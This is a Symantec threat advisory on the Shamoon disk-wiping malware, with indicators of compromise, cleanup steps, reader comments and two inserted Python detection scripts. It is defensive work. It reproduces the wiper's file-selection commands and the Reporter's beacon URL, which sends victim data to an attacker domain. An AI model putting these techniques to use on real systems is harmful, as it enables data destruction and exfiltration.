Support Perspective and Battle Plan - W32.Disttrack / W32.Disttrack.B (Shamoon) 2017 

Jan 27, 2017 12:55 PM

I. BACKGROUND:

Symantec is currently investigating reports of another new attack in the Middle East involving the destructive disk-wiping malware used by the Shamoon group (W32.Disttrack / W32.Disttrack.B). As in previous attacks, the Disttrack malware used by Shamoon is only the destructive payload: it requires other means to be deployed on targeted organizations' networks and is configured with previously stolen credentials.

Symantec discovered the Greenbug cyberespionage group during its investigation into previous attacks involving W32.Disttrack.B (aka Shamoon). Shamoon (W32.Disttrack) first made headlines in 2012 when it was used in attacks against energy companies in Saudi Arabia. It recently resurfaced in November 2016 (W32.Disttrack.B), again attacking targets in Saudi Arabia. While these attacks were covered extensively in the media, how the attackers stole these credentials and introduced W32.Disttrack on targeted organizations’ networks remains a mystery.

Could Greenbug be responsible for getting Shamoon those stolen credentials?

Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors. The group uses a custom information-stealing remote access Trojan (RAT) known as Trojan.Ismdoor as well as a selection of hacking tools to steal sensitive credentials from compromised organizations.

Although there is no definitive link between Greenbug and Shamoon, the group compromised at least one administrator computer within a Shamoon-targeted organization’s network prior to W32.Disttrack.B being deployed on November 17, 2016.

II. THREAT DETAILS:

The worm creates the following files:

  • %System%\trksrv.exe
  • %System%\netinit.exe
  • %System%\drivers\drdisk.sys
  • %System%\[NAME SELECTED FROM LIST].exe
    (see below for currently known list)

The worm deletes the following file:

  • %System%\drivers\drdisk.sys

The worm is comprised of several components:

  • Dropper: main component that drops other modules and is the first to infect the system
  • Wiper: module that contains destructive functionality
  • Reporter: module that reports infection information back to the attacker

The Dropper

The Dropper component has the following functionality:

  • Copies itself to %System%\trksrv.exe
  • Drops the following files embedded into resources:
    • 64-bit Dropper: %System%\trksrv.exe (contained in the "X509" resource)
    • Reporter module: %System%\netinit.exe (contained in the "PKCS7" resource)
    • Wiper module: %System%\[NAME SELECTED FROM LIST].exe (contained in the "PKCS12" resource)
      • Note: [NAME SELECTED FROM LIST] may be one of the following:
        • caclsrv
        • certutl
        • clean
        • ctrl
        • dfrag
        • dnslookup
        • dvdquery
        • event
        • extract
        • findfile
        • fsutl
        • gpget
        • iissrv
        • ipsecure
        • msinit
        • ntx
        • ntdsutl
        • ntfrsutil
        • ntnw
        • power
        • rdsadmin
        • regsys
        • routeman
        • rrasrv
        • sacses
        • sfmsc
        • sigver
        • smbinit
        • wcscript
  • Copies itself to the following network shares:
    • \\[COMPUTER NAME]\ADMIN$
    • \\[COMPUTER NAME]\C$\WINDOWS
    • \\[COMPUTER NAME]\D$\WINDOWS
    • \\[COMPUTER NAME]\E$\WINDOWS
  • Creates a scheduled job task to execute itself
  • Creates the following service to start itself when Windows starts:
    • Service: TrkSvr
    • DisplayName: Distributed Link Tracking Server
    • ImagePath: %System%\trksrv.exe

The Wiper

The Wiper module has the following functionality:

  • Deletes the existing driver from the following location and writes a different legitimate driver embedded in resources:
    • %System%\drivers\drdisk.sys
  • The device driver is a clean disk driver that enables user-land applications to read and write to disk sectors. The driver is used to overwrite the computer's MBR but is not malicious by itself.
  • The file is digitally signed by "EldoS Corporation".
  • Executes the following commands to collect the names of the files to be overwritten, writing them to f1.inf and f2.inf:
    • dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf
    • dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf
    • dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf
    • dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf
    • dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf
    • dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf
  • Note: Files from f1.inf and f2.inf will be overwritten with a JPEG image that is located in the Wiper module. Overwritten files are rendered useless and cannot be repaired.
  • The module will overwrite the MBR so that the compromised computer can no longer boot.
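The dropper and wiper details above are concrete enough to turn into a triage check. The following Python helper is an added example (not code from Symantec or from this page): run over a collected inventory of file paths and service records, it flags the dropped components, any executable in %System% carrying one of the wiper names, and the TrkSvr service, and it reproduces the dir/findstr selection so a responder can see which inventory entries the wiper would have overwritten (a restore-from-backup priority list). It assumes %System% is C:\Windows\System32, takes the inventory as plain Python lists, and the sample inventory in it is constructed, not taken from a real incident.

```python
"""Triage check for W32.Disttrack (Shamoon) host artifacts.

Added example, not Symantec's code. It runs over an artifact inventory
(full file paths plus service records, as a triage collection exports)
so it can be exercised offline; on a live Windows host feed it os.walk()
output and the service list instead. Indicators come from the THREAT
DETAILS section; %System% is assumed to be C:\\Windows\\System32, and the
sample inventory at the bottom is constructed for this example.
"""
import re
from dataclasses import dataclass

# Names the wiper module may be dropped under (%System%\<name>.exe).
WIPER_NAMES = {
    "caclsrv", "certutl", "clean", "ctrl", "dfrag", "dnslookup", "dvdquery",
    "event", "extract", "findfile", "fsutl", "gpget", "iissrv", "ipsecure",
    "msinit", "ntx", "ntdsutl", "ntfrsutil", "ntnw", "power", "rdsadmin",
    "regsys", "routeman", "rrasrv", "sacses", "sfmsc", "sigver", "smbinit",
    "wcscript",
}
# Fixed-name components: dropper copy, reporter, and the EldoS raw-disk driver.
FIXED_FILES = {
    "c:\\windows\\system32\\trksrv.exe": "dropper",
    "c:\\windows\\system32\\netinit.exe": "reporter",
    "c:\\windows\\system32\\drivers\\drdisk.sys": "eldos raw-disk driver",
}
WIPER_RE = re.compile(r"c:\\windows\\system32\\([a-z]+)\.exe")
SERVICE_NAME, SERVICE_DISPLAY = "trksvr", "distributed link tracking server"

# Wiper file selection (the dir/findstr commands): case-insensitive substring
# match on the full path, files only. Every path under
# "C:\Documents and Settings\" contains "document", so on XP-style profiles
# the whole tree is selected.
USER_RULES = (
    ("c:\\documents and settings\\", ("download", "document", "desktop")),
    ("c:\\users\\", ("download", "document", "picture", "video", "music", "desktop")),
)
DRIVERS_DIR = "c:\\windows\\system32\\drivers\\"
CONFIG_DIR = "c:\\windows\\system32\\config\\"


@dataclass(frozen=True)
class Service:
    name: str
    display_name: str
    image_path: str


def _norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def find_artifacts(paths, services):
    """Return (kind, evidence) pairs for every Disttrack indicator present."""
    hits = []
    for p in paths:
        n = _norm(p)
        if n in FIXED_FILES:
            hits.append((FIXED_FILES[n], p))
            continue
        m = WIPER_RE.fullmatch(n)
        if m and m.group(1) in WIPER_NAMES:
            hits.append(("wiper candidate", p))
    for s in services:
        if s.name.lower() == SERVICE_NAME or s.display_name.lower() == SERVICE_DISPLAY:
            # A legitimate TrkSvr (Windows 2000/XP era) is hosted by services.exe;
            # a standalone ImagePath equal to a dropped file is the Disttrack persistence.
            kind = "trksvr service"
            if _norm(s.image_path.split(" ", 1)[0]) in FIXED_FILES:
                kind += " (Disttrack ImagePath)"
            hits.append((kind, f"{s.name}: {s.image_path}"))
    return hits


def wiper_targets(paths):
    """Paths the wiper's f1.inf/f2.inf selection would overwrite."""
    targets = []
    for p in paths:
        n = _norm(p)
        for root, keywords in USER_RULES:
            if n.startswith(root) and any(k in n for k in keywords):
                targets.append(p)
                break
        else:
            if n.startswith(DRIVERS_DIR):
                targets.append(p)
            elif n.startswith(CONFIG_DIR) and "systemprofile" not in n:
                targets.append(p)
    return targets


# Constructed sample inventory (not from a real incident).
SAMPLE_PATHS = [
    "C:\\Windows\\System32\\trksrv.exe",
    "C:\\Windows\\System32\\netinit.exe",
    "C:\\Windows\\System32\\drivers\\drdisk.sys",
    "C:\\Windows\\System32\\ntfrsutil.exe",
    "C:\\Windows\\System32\\calc.exe",
    "C:\\Users\\alice\\Documents\\budget.xlsx",
    "C:\\Users\\alice\\AppData\\Local\\cache.bin",
    "C:\\Users\\alice\\Desktop\\notes.txt",
    "C:\\Windows\\System32\\Config\\SYSTEM",
    "C:\\Windows\\System32\\Config\\systemprofile\\ntuser.dat",
    "C:\\Windows\\System32\\drivers\\ntfs.sys",
]
SAMPLE_SERVICES = [
    Service("TrkSvr", "Distributed Link Tracking Server", "C:\\Windows\\System32\\trksrv.exe"),
    Service("TrkWks", "Distributed Link Tracking Client",
            "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted"),
]

if __name__ == "__main__":
    for kind, evidence in find_artifacts(SAMPLE_PATHS, SAMPLE_SERVICES):
        print(f"[ARTIFACT] {kind}: {evidence}")
    for target in wiper_targets(SAMPLE_PATHS):
        print(f"[WOULD-BE-WIPED] {target}")
```

The wiper-name check is deliberately restricted to files directly in %System%: the list is full of names that look like legitimate utilities, so a bare name match anywhere on disk would be noisy. On a hit machine the `wiper_targets` output tells you what to restore; it cannot tell you what survived, because the page states overwritten files are unrecoverable.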

The Reporter

The Reporter module is responsible for sending information about the infection to the attacker. Information is sent as an HTTP GET request and is structured as:

  • http://[DOMAIN]/ajax_modal/modal/data.asp?mydata=[MYDATA]&uid=[UID]&state=[STATE]

The following data is sent to the attacker:

  • [DOMAIN] = domain name
  • [MYDATA] = specifies how many files were overwritten
  • [UID] = IP address of the compromised computer
  • [STATE] = random number
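The request shape above is enough to write a proxy-log detection even though this page gives no concrete value for [DOMAIN] (Step 2 and the firewall question in the Q&A below assume you already know the domains). The following Python is an added example, not Symantec's code: it matches the Reporter GET on its path and query parameters, validates that mydata and state are numbers and uid is an IP address, and records when the self-reported uid differs from the proxy's view of the client. The log format ("timestamp client_ip method url status") is an assumption, and the sample lines, with hostnames under the reserved .invalid TLD, are constructed.

```python
"""Proxy-log detection for the W32.Disttrack Reporter beacon.

Added example, not Symantec's code. The request shape comes from the
Reporter section; this page names no concrete C&C domain, so matching
is on the path and query parameters rather than on a domain list.
Assumed log format: "timestamp client_ip method url status". The sample
lines are constructed and use the reserved .invalid TLD.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

BEACON_PATH = "/ajax_modal/modal/data.asp"
REQUIRED_PARAMS = {"mydata", "uid", "state"}
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})"
)


def parse_beacon(url):
    """Return the beacon's fields if `url` has the Reporter GET shape, else None.

    mydata must be a count (files overwritten), uid an IP address of the
    reporting host, state a number; anything else is treated as a miss."""
    parts = urlsplit(url)
    if parts.path.lower() != BEACON_PATH:
        return None
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not REQUIRED_PARAMS <= set(qs):
        return None
    mydata, uid, state = (qs[k][0] for k in ("mydata", "uid", "state"))
    if not (mydata.isdigit() and state.isdigit()):
        return None
    try:
        victim = ipaddress.ip_address(uid)
    except ValueError:
        return None
    return {
        "domain": parts.hostname,
        "victim_ip": str(victim),
        "files_overwritten": int(mydata),
        "state": int(state),
    }


def scan_proxy_log(lines):
    """Return one alert dict per Reporter beacon found in the log lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue
        beacon = parse_beacon(m.group("url"))
        if beacon is None:
            continue
        # A 4xx/5xx reply still counts: the attempt shows the wiper ran.
        beacon["status"] = int(m.group("status"))
        beacon["timestamp"] = m.group("ts")
        beacon["proxy_client"] = m.group("client")
        # uid is self-reported by the wiper; if it differs from the proxy's
        # view of the client (NAT, relay), use uid to identify the hit host.
        beacon["client_mismatch"] = beacon["proxy_client"] != beacon["victim_ip"]
        alerts.append(beacon)
    return alerts


# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
1479378000.101 10.20.30.40 GET http://example.invalid/ajax_modal/modal/data.asp?mydata=1532&uid=10.20.30.40&state=38291 200
1479378001.512 10.20.30.41 GET http://intranet.example.invalid/ajax_modal/modal/index.asp?page=2 200
1479378002.777 10.20.30.42 GET http://example.invalid/ajax_modal/modal/data.asp?mydata=7&uid=10.20.30.42&state=4 404
1479378003.004 10.20.30.43 GET http://cdn.example.invalid/ajax_modal/modal/data.asp?mydata=x&uid=notanip&state=1 200
1479378004.220 192.0.2.9 GET http://example.invalid/ajax_modal/modal/data.asp?mydata=0&uid=10.20.30.44&state=99 200
"""

if __name__ == "__main__":
    for a in scan_proxy_log(SAMPLE_LOG.splitlines()):
        flag = " [client/uid mismatch]" if a["client_mismatch"] else ""
        print(f"{a['timestamp']} {a['proxy_client']} -> {a['domain']}: host "
              f"{a['victim_ip']} reports {a['files_overwritten']} files overwritten{flag}")
```

Because the beacon is sent after the overwrite, an alert is evidence of a machine that is already wiped, not one you can still save; its value is in scoping (the uid names the host, mydata the damage) and in the domain it reveals, which is what you then block at the perimeter.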

How it spreads:

When the worm is executed, it copies itself to the following network shares:

  • \\[COMPUTER NAME]\ADMIN$
  • \\[COMPUTER NAME]\C$\WINDOWS
  • \\[COMPUTER NAME]\D$\WINDOWS
  • \\[COMPUTER NAME]\E$\WINDOWS

Coverage:

Symantec Endpoint Protection:
Antivirus Signatures:

Intrusion Prevention Signatures:

Applying the 5 Steps of Virus Troubleshooting to a W32.Disttrack (Shamoon) Outbreak 
AKA 
The Shamoon Battle Plan

Step 1. Identify the threat

  • This means getting AV detection on any new (undetected) samples.

Step 2. Identify infected machines:

  • Machines with Auto-Protect alerts should be scanned with up-to-date definitions.
  • The entire network needs to be audited for unprotected machines, out of date machines, and infected or likely infected machines.
  • Traffic to known Shamoon domains is a good indicator of a potentially infected machine.
  • Protecting and managing file servers is often the key to solving any outbreak scenario; unprotected NAS devices are at risk!

Step 3. Quarantine the infected/unprotected/under protected machines: 

  • Unprotected and under-protected machines need to be removed from the network until cleaned and protected.
  • Unprotected machines should be returned to the network only after being protected, checked for suspect files, and scanned clean.

Step 4. Clean the infected machines:

  • Infected machines need to be scanned clean. Safe Mode is not necessary, just a basic Full System Scan.
  • Don’t forget file servers. This bears repeating.
  • Watch scan logs closely for indications of “Reboot required” or results that indicate a potential issue like “Quarantine failed”

Step 5. Prevent future outbreaks:

  • AutoPlay is a spreading mechanism for thousands of worms and should be disabled. Microsoft has moved to this position as well.
  • An "Open Share" is any share that does not require a password to access. Password-restricting shares can slow or stop a worm like this in its tracks.
  • Remove write-access on shares from users not needing this level of access.
  • Maintain a strict patching regimen. Threats often add new capabilities in response to new vulnerabilities.
  • Once clean, upgrade to the newest version of SEP (Recommended: with all technologies installed).
  • Review mail server policies.

III. Questions and Answers

Q - How does this spread, once in the network?
A - Administrator shares (ADMIN$, C$, D$, E$) on other machines, reached with the stolen credentials the worm is configured with. Closing these shares, removing infected machines from the network, or dropping infected machines to a quarantined subnet will keep this from spreading. Enabling Network Auto-Protect will also help.

Q - How did this get into my network?
A – There are preliminary indications that Greenbug could be responsible for delivering Shamoon.  The presence of Greenbug within an organization prior to the destructive attack involving W32.Disttrack.B provides only a tentative connection to Shamoon. Greenbug’s choice of targets and the fact that Ismdoor and associated tools downloaded by the threat appear to have gone quiet a day prior to the November 17, 2016 Shamoon attack is, however, suspicious. At this time, Symantec tracks these groups separately unless additional corroborating evidence emerges.  

Q - Will patching vulnerabilities help me stop this threat in my network?
A - No, vulnerabilities can be a door and the threat has already come in. These vulnerabilities should be patched ASAP (along with any other holes in the environment), but this will not counter an already-live infection.

Q - Are there URLs and Domains I should be blocking at the firewall?
A - Yes.  See Section II (The Reporter)

Q - What about Autorun?
A – The Shamoon variants observed haven’t been using this, however autoplay should be disabled either with a GPO or ADC policy, just in case.

IV. W32.DISTTRACK (SHAMOON) MITIGATION POSTURE

Note: This is not necessarily a checklist of everything you must do, but a way to understand where your environment may need to be scrutinized.

  • Autorun / AutoPlay Disabled?
  • Open File Shares Closed/Password Protected? Strong Passwords?
  • All Unprotected machines removed from the network and queued for updates/cleaning/protection?
  • Associated URLs blocked at the Perimeter Firewall / Client Firewall?
  • SEP AutoProtect set to load at System Startup?
  • SEP Network AutoProtect enabled?
  • Application and Device Control policy implemented (attached)?

V. REFERENCES:

VI. ATTACHMENTS

  • Block_Eldos_driver_v4.dat
    • ADC policy to block known versions of the Eldos driver used by Shamoon.

NOTE: Above ADC policy no longer needed, as we have released signature PUA.Disttrack!sys to protect machines from Shamoon proactively.

Comments

Feb 28, 2017 10:01 AM

Every time I read these kind of articles I wonder if the actual developer of the malware/ransomware/virus gets caught. Would be really interesting to see a statistic of the malware successfully delivered in the last decade sorted by the amount of damage they've done to the person/company/government and how many of them were actually traced back to a developer. Anyhow, the article above is quite detailed and doesn't seem to leave any gaps for administrators who want to ensure that they are protected against the mentioned malware.

Feb 27, 2017 03:05 AM

Great article and in-depth info on the threat; with this article one can definitely have the idea on how to tackle it if such a situation arises, and with the custom policy suggested by Symantec it will be very easy....

Feb 25, 2017 08:26 AM

This is an excellent article and it should clear out most of the confusion anyone had on what Shamoon does and how it affects users' systems. Some of the things are so simple yet so destructive and so difficult to come back from.

It also shows how important it is to have better protection at "the front door".

Thank you to Symantec for the detailed analysis and protection!

Feb 24, 2017 04:56 AM

IT security is messed up with multiple solutions and resources. People don't think from a technological angle and they depend solely on automation of the solution. Great efforts are required to go through articles and implement those tiny points.

Feb 17, 2017 06:10 PM

Always interesting to see what the latest threats are. Even better that we get information on how to avoid it. thanks symantec!

Feb 15, 2017 07:12 AM

What happened to hacks for the lulz? Wiping someone's drive seems pointless, but not if you're trying to destroy a company. It's not even financially motivated like cryptolocker. I like when Symantec shows exactly what the malware is doing to the file system. It helps in sandboxes to understand how it behaves.

Feb 15, 2017 05:55 AM

Huge write-up. This sort of IOC information is incredibly important. This kind of report will allow us to be kept on our toes and catch them before it gets worse. Technology is in place and needs more operational attention.

Feb 14, 2017 04:07 PM

The in-depth details are very important to let us "know" what it does and follow it to resolve this problem. This type of report will allow us to find the problems within our reach in a much simpler way.

Feb 14, 2017 10:42 AM

Good article with lots of useful information. Just goes to show you how advanced these threats are getting. Can always rely on Symantec to give us the latest information! 

Feb 13, 2017 09:53 AM

While I don't know all of the bits and bytes of this article it is nice to see such a detailed write-up of things. Keep up the good work.

Feb 10, 2017 04:05 AM

Good information. One will get lost in this article. But it's important that Symc is taking this much effort to give a detailed analysis to keep us informed and secure. We need such help much more as today's world is full of threats and risks. Great going.

Feb 10, 2017 12:07 AM

Good article. Don't know how many will read it carefully and use it, as Symantec has put their full effort into publishing this. Many times just holding a solution is not useful; one must know how to use it with the help of OEM best practices.

Feb 09, 2017 01:42 AM

Nice article released by the Symantec team; it also provides the full threat information with a custom IPS policy, so risk propagation will be low.

Feb 08, 2017 10:33 AM

Very good reading. I do really enjoy all the technical aspects of the article.

My company luckily, while having offices in Saudi Arabia, has not been threatened with this malware.

Good to know that Symantec's definitions are now able to catch this and stop it before destroying any data.

Feb 07, 2017 07:52 AM

Very interesting and detailed read, I hope more articles like these are released, it helps a lot.

Feb 07, 2017 05:22 AM

Another great article. There's a lot of detail here which is great. This is very thorough and well done! This sort of report will allow us to be kept on our toes and catch them before it gets worse. Also a good reminder to make sure everything's updated and patched!

Feb 07, 2017 03:29 AM

Great Article by _DW.

This in-depth analysis along with the ADC policy to block known versions of the Eldos driver used by Shamoon is going to assist a lot of Symantec users.

Thank you for providing this.

Security means Symantec!!!

Feb 07, 2017 02:39 AM

Fully thorough article. Great help. The Q & A section is going to help desktop guys who are working in the field, and the users are gonna get relief. Detailed analysis and remediation is very much useful. Thanks Symantec for securing us!!! You care.

Feb 06, 2017 02:17 PM

I love seeing articles like this! Even though it looks like this particular threat will make it my way soon, it's great to have the knowledge. Patching up these holes proactively helps when they decide to sell their kit, too.

Feb 06, 2017 10:55 AM

Great article @Symantec!

It's crazy how we as IT people have to have dual roles in security, not saying that it's a terrible thing though.  However, it's good to see that @Symantec is making our jobs a little easier, as always.  :)

Feb 06, 2017 09:07 AM

Even old destructive code from 2012 is going to be useful on a target computer if it can get on the machine.  It doesn't matter how the credentials were obtained (social engineering, hacking etc.) this is still the 'front door'.  The sooner more companies embrace 2FA (fob or biometrics etc.) for auth then the less effective hacking and social engineering credential theft will be.

Feb 06, 2017 06:43 AM

Just another example as to what makes Symantec stand out from the competition. They just don't report on the malicious findings they also provide steps and information on how to avoid it as well as other important data.

Feb 06, 2017 05:56 AM

Great article these are really interesting. It's amazing how advanced these threats are getting. Also a nice reminder to make sure everything is patched and up to date!

Feb 06, 2017 03:53 AM

Another good article by Symantec, with lots of useful information. As far as I can remember this is the first article detailing specific threat advisories; this sort of IOC information is very important. Also a good reminder to make sure everything's updated and patched!

Feb 06, 2017 03:16 AM

More of this, please. The in-depth details are very important to allow us to 'know' what it does and track it down to resolve this issue. This sort of report will allow us to be kept on our toes and catch them before it gets worse.

Thank you for sharing this.

Feb 06, 2017 02:50 AM

Another tedious malware. Really a nice article with a lot of detailed information; it will be great for us. Though I have not seen or heard of anyone that I know who manages SEP reporting such a detection, this is a good reminder.

Feb 05, 2017 10:38 PM

I don't recall seeing specific threat advisories like this from Symantec.  This sort of IOC information is incredibly important!  This is very thorough and well done!  If there is any sort of distribution list for this data, please someone speak up!

Feb 05, 2017 04:43 PM

There's a lot of detail here which is great. Looking at the files placed and how it executes, we've already got everything in place that would stop this being able to create files and replicate. Will add this to the lists, as always, but a lot of best-practice should cripple this from the onset.

Feb 05, 2017 03:39 PM

Great article. The amount of detail and time put into it is amazing. This gives the incident responder a good ability to create YARA rules or even combine the ADC policy with their current one. Thanks for providing this, it is awesome!

Feb 05, 2017 02:23 PM

Another great read!!!
I like how you referenced The Honeymooners even though I'm probably the only one here that knows it... Lots of good info for people to understand the different types of attacks and how to prevent them.
